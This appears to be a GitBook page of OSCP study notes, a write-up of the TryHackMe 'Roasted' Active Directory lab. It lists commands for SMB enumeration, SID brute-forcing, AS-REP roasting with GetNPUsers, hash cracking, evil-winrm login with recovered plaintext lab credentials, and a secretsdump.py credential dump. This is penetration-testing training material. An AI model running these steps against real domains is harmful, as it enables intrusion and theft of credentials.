📚
OSCP
  • Pentesting
  • Proving Grounds practice
    • Warm up
      • Windows
        • Kevin
        • Internal
        • Metallus
      • Linux
        • ClamAV
        • Exfiltrated
        • Twiggy
    • Get to work
      • Windows
        • Slort
        • Billyboss
        • Fish
        • UT99
        • AuthBy
        • Jacko
        • Shenzi
      • Linux
        • Dibble
        • Pelican
        • Sorcerer
        • Zino
        • Zenphoto
        • Snookums
        • Nibbles
        • Chatty
        • Banzai
    • Try harder
      • Windows
        • Meathead
      • Linux
        • Sirol
        • Peppo
        • Clyde
  • Buffer overflow
    • Buffer Overflow Methodology
    • TryHackMe Practice
      • Overflow1
      • Overflow2
      • Overflow3
      • Overflow4
      • Overflow5
      • Overflow6
      • Overflow7
      • Overflow8
      • Overflow9
      • Overflow10
  • Active Directory
    • AD Authentication
      • NTLM Authentication
      • Kerberos Authentication
    • TryHackMe Practice
      • Attacktive Directory
      • Roasted
      • RazorBlack
    • PG Practice
      • Hutch
      • Vault
      • Heist
Powered by GitBook
On this page
  • Information Gathering
  • Service Enumeration
  • SMB (Port 139/445)

Was this helpful?

  1. Active Directory
  2. TryHackMe Practice

Roasted

PreviousAttacktive DirectoryNextRazorBlack

Last updated 3 years ago

Was this helpful?

Information Gathering

sudo nmapAutomator.sh 10.10.22.148 all

Service Enumeration

SMB (Port 139/445)

Seems like we have read perms for business-anonymous and enterprise-anonymous shares.

crackmapexec smb 10.10.22.148 -u 'Anonymous' -p '' --shares

Let's download the files and check out if there is anything interesting.

Does not look like there is much other than the employee names which could be useful for further enumeration.

At least now we know there is anonymous login, we can make use of impacket's lookupsid which

performs brute-forcing of Windows SID’s to identify users/groups on the remote target.

lookupsid.py Anonymous@10.10.22.148 >> users.txt

Extract usernames with vim magic.

Let's use impacket's GetNPUsers to list and get TGTs for those users that have the property 'Do not require Kerberos pre authentication' set (UF_DONT_REQUIRE_PREAUTH).

GetNPUsers.py vulnnet-rst.local/ -dc-ip 10.10.22.148 -usersfile users.txt

Great, looks like we have the hash for t-skid user. We can use john to crack it.

Let's check if we have any new access in SMB.

Looks like under the NETLOGON share there is a ResetPassword.vbs file.

Seems like we are able to get some credentials that are in plaintext in the file.

a-whitehat:bNdKVkjv3RR9ht

evil-winrm -i 10.10.22.148 -u a-whitehat -p 'bNdKVkjv3RR9ht'

Impacket’s secretsdump.py will perform various techniques to dump secrets from the remote machine without executing any agent. Techniques include reading SAM and LSA secrets from registries, dumping NTLM hashes, plaintext credentials, and Kerberos keys, and dumping NTDS.dit. The following command will attempt to dump all secrets from the target machine using the previously mentioned techniques.

secretsdump.py 'vulnnet-rst.local/a-whitehat@10.10.22.148'